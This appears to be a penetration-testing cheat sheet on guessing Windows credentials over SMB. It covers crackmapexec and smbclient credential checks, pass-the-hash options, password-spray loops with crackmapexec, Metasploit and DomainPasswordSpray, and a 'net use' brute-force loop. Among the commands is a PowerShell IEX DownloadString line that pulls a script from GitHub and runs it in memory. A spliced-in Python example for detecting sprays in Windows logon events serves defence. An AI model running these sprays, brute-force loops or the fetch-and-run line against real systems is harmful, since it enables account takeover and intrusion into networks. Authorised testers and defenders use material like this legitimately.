SMB

Use the SMB service to guess Windows-related credentials. This is especially useful in an Active Directory environment, where one valid account usually opens up further enumeration.


Check Credentials

crackmapexec
crackmapexec smb [HOST] -u [USERNAME] -p [PASSWORD] -d [DOMAIN]

Result       Description
[+] PWNED    Valid credentials and local administrator
[+] green    Valid credentials
[-] red      Invalid credentials (or other error)

Tip

Use -H [NTHASH] instead of -p [PASSWORD] to authenticate using the pass-the-hash technique.

smbclient
smbclient //[HOST]/[SHARE] [PASSWORD] -U [USERNAME] -W [DOMAIN]

If the credentials work you get an smb: \> prompt. Note that smbclient takes the domain with -W (workgroup); -d sets the debug level.

Tip

Use --pw-nt-hash and provide the NT hash instead of the password to authenticate using the pass-the-hash technique.

Note

Find available shares using share enumeration techniques.

Password Spray

Always be careful about account lockout when performing password spray attacks in an Active Directory environment: one password tried against every account stays under the lockout threshold only if the domain's lockout policy allows it. See the users enumeration techniques to get the list of all AD users and their failed password attempt count.

crackmapexec
for user in $(cat users.txt); do crackmapexec smb [HOST] -u $user -p [PASSWORD] -d [DOMAIN]; done

All valid users will be automatically saved to the crackmapexec database. Use the creds command of the cmedb utility to display valid credentials.

Info

The database file of cmedb is located at ~/.cme/cme.db.

Metasploit - smb_login
use auxiliary/scanner/smb/smb_login
set RHOSTS [HOST]
set USER_FILE [USERS.txt]
set SMBDomain [DOMAIN]
set SMBPass [PASSWORD]
run

All valid users will be automatically saved to the workspace creds database.

PowerShell - DomainPasswordSpray.ps1

Automates the whole user enumeration and password spray process when run from within the domain.

Invoke-DomainPasswordSpray -Password [PASSWORD] -OutFile [VALID-CREDS.txt]

When using the -PasswordList option, it will attempt to gather the account lockout observation window from the domain and limit sprays to one per observation window to avoid locking out accounts.

Invoke-DomainPasswordSpray -PasswordList [PASSWORDS.txt] -OutFile [VALID-CREDS.txt]

Of course, the users list and domain name can also be specified manually.

Invoke-DomainPasswordSpray -Domain [DOMAIN] -UserList [USERS.txt] -Password [PASSWORD] -OutFile [VALID-CREDS.txt]

Note

The script can be loaded directly into memory from GitHub:

IEX (New-Object System.Net.WebClient).DownloadString('https://github.com/dafthack/DomainPasswordSpray/raw/master/DomainPasswordSpray.ps1')

Reference: https://github.com/dafthack/DomainPasswordSpray
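From the defender's side, the spray pattern described in this section (one password, many accounts, from one source over SMB) is what a detection rule keys on. The following Python is an added example, not part of this cheat sheet: it runs over a constructed, simplified export of Windows Security events (4625 failures with Sub Status 0xC000006A for a wrong password, 4624 successes) and flags a source that fails network logons against many distinct accounts within a short window, reporting whether a successful logon from the same source followed.

```python
# Added example (not from this cheat sheet): flag a password spray in Windows
# Security events and note whether the source then logged on successfully.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export: timestamp|event_id|source_ip|target_user|logon_type|substatus
SAMPLE_EVENTS = """\
2024-05-01T09:00:01|4625|10.0.0.5|alice|3|0xC000006A
2024-05-01T09:00:02|4625|10.0.0.5|bob|3|0xC000006A
2024-05-01T09:00:03|4625|10.0.0.5|carol|3|0xC000006A
2024-05-01T09:00:04|4625|10.0.0.5|dave|3|0xC000006A
2024-05-01T09:00:06|4624|10.0.0.5|erin|3|0x0
2024-05-01T09:05:00|4625|10.0.0.9|alice|3|0xC000006A
2024-05-01T09:05:30|4625|10.0.0.9|alice|3|0xC000006A
"""

def parse_events(text):
    """Parse the pipe-separated export into dicts with a datetime timestamp."""
    events = []
    for line in text.strip().splitlines():
        ts, eid, src, user, ltype, substatus = line.split("|")
        events.append({"ts": datetime.fromisoformat(ts), "id": int(eid), "src": src,
                       "user": user, "type": int(ltype), "substatus": substatus})
    return events

def detect_spray(events, min_users=4, window=timedelta(minutes=10)):
    """Return {source_ip: finding} for sources with wrong-password network logon
    failures (type 3, 4625, 0xC000006A) against >= min_users accounts in `window`."""
    failures, successes = defaultdict(list), defaultdict(list)
    for e in events:
        if e["type"] == 3 and e["id"] == 4625 and e["substatus"] == "0xC000006A":
            failures[e["src"]].append(e)
        elif e["type"] == 3 and e["id"] == 4624:
            successes[e["src"]].append(e)
    findings = {}
    for src, fails in failures.items():
        fails.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(fails)):  # sliding time window over the failures
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            users = {e["user"] for e in fails[start:end + 1]}
            if len(users) >= min_users:
                last = fails[end]["ts"]
                findings[src] = {"distinct_users": len(users), "first": fails[start]["ts"],
                                 "last": last,
                                 # a success from the same source after the spray is the
                                 # strongest sign that a password was guessed
                                 "success_after_spray": any(s["ts"] >= last for s in successes[src])}
                break
    return findings
```

In the sample, 10.0.0.5 is flagged (four accounts in four seconds, then a success), while 10.0.0.9 hammering a single account is left to the lockout policy rather than this rule.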

Brute Force

Native Windows - net use
for /F %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && pause

The loop stops (pause) on the first password that net use accepts. Run it from an interactive prompt; inside a batch file the loop variable must be written %%i.

Alternatively, we could append our result to a file:

for /F %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && echo [username]: %i >> [output_file]